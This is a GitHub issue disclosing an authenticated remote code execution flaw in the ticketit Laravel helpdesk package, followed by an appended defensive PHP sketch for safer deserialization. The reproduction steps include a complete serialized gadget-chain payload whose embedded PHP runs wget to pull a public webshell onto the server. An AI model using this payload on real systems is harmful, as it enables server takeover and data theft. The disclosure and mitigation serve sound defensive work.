thekordy / ticketit

A simple helpdesk tickets system for Laravel 5.1+ which integrates smoothly with Laravel default users and auth system. A demo is available at: http://ticketit.kordy.info/tickets
MIT License
874 stars, 384 forks

Authenticated Remote Code Execution via Insecure Deserialization #590

Open ghost opened 3 years ago

ghost commented 3 years ago

Hello,

I recently found it is possible to inject OS commands in the tickets-admin configuration. Steps to reproduce:

  1. Log into TicketIt
  2. Go to Settings -> Configuration
  3. Go to "Initial" tab
  4. Change bootstrap_version from 4 to 3
  5. Go to "Other" tab, click Add New Setting
  6. Put any value you want as the slug
  7. Paste this payload into the "Default Value" and/or "My Value" values: a:2:{i:7;O:29:"Illuminate\Support\MessageBag":2:{S:11:"\00*\00messages";a:0:{}S:9:"\00*\00format";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{S:9:"\00*\00events";O:25:"Illuminate\Bus\Dispatcher":1:{S:16:"\00*\00queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;S:4:"load";}}S:8:"\00*\00event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{S:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{S:9:"\00*\00config";O:35:"Mockery\Generator\MockConfiguration":1:{S:7:"\00*\00name";S:7:"abcdefg";}S:7:"\00*\00code";S:104:"<?php system('wget https://raw.githubusercontent.com/drag0s/php-webshell/master/webshell.php'); exit; ?>";}}}}i:7;i:7;}
  8. Click Submit
  9. Go to the new setting
  10. Click "Edit"; now there is a webshell available at http://localhost:8000/webshell.php
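
A defensive sketch for the report above, added here as an example and not taken from the ticketit code base: it assumes, as the issue title implies, that a setting's stored value reaches PHP's `unserialize()` when the edit page loads. The function names `decodeSettingValue()` and `containsObject()` are hypothetical, and the sample values are constructed.

```php
<?php
declare(strict_types=1);

// Added example: decodeSettingValue() and containsObject() are hypothetical
// names, not functions from ticketit.

/** True if the decoded value holds an object at any depth. */
function containsObject($value): bool
{
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (containsObject($item)) {
                return true;
            }
        }
    }
    return false;
}

/** Decode a stored setting without instantiating any class named in it. */
function decodeSettingValue(string $raw)
{
    // allowed_classes => false (PHP 7.0+) turns every serialized object into
    // __PHP_Incomplete_Class, so no __wakeup() or __destruct() of an
    // application or vendor class runs during or after decoding.
    $value = @unserialize($raw, ['allowed_classes' => false]);

    if ($value === false && $raw !== 'b:0;') {
        return $raw; // not serialized data: keep it as a plain string
    }
    if (containsObject($value)) {
        throw new InvalidArgumentException('Serialized objects are not accepted in settings');
    }
    return $value;
}

// Constructed sample values (not taken from the issue).
$samples = ['plain text', 'a:2:{i:0;s:3:"low";i:1;s:4:"high";}', 'O:8:"stdClass":0:{}'];
foreach ($samples as $raw) {
    try {
        echo json_encode(decodeSettingValue($raw)), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Storing setting values as JSON and reading them with `json_decode()` removes the object-instantiation path altogether, since JSON decoding never constructs application classes.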